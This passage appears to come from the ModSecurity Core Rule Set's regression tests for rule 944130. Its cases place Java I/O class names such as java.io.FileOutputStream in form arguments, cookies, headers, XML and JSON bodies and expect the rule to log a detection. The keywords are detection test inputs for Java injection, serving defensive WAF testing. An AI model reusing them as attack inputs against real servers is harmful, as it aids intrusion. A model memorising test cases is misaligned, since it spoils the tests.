"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-102 - desc: "Cookie name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-103 - desc: "Request header test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-104 - desc: "XML attribute value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-105 - desc: "XML element value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-106 - desc: "Nested XML element value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-107 - desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - 
output: - log_contains: "id \"944130\"" - - - - test_title: 944130-108 - desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-109 - desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-110 - desc: "Argument test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id 
\"944130\"" - - - - test_title: 944130-111 - desc: "Argument name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-112 - desc: "Cookie test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-113 - desc: "Cookie name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - 
test_title: 944130-114 - desc: "Request header test includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-115 - desc: "XML attribute value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-116 - desc: "XML element value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-117 - desc: "Nested XML element value includes keyword 
java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-118 - desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-119 - desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-120 - desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" - stages: - - - stage: - input: 
- dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-121 - desc: "Argument test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-122 - desc: "Argument name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-123 - desc: "Cookie test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-124 - desc: "Cookie name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-125 - desc: "Request header test includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-126 - desc: "XML attribute value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-127 - desc: "XML element value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-128 - desc: "Nested XML element value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-129 - desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-130 - desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-131 - desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-132 - desc: "Argument test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-133 - desc: "Argument name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-134 - desc: "Cookie test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-135 - desc: "Cookie name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-136 - desc: "Request header test includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-137 - desc: "XML attribute value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-138 - desc: "XML element value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-139 - desc: "Nested XML element value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-140 - desc: "Content-Type text/plain includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-141 - desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-142 - desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-143 - desc: "Argument test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-144 - desc: "Argument name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-145 - desc: "Cookie test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-146 - desc: "Cookie name includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-147 - desc: "Request header test includes keyword java.io.InputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 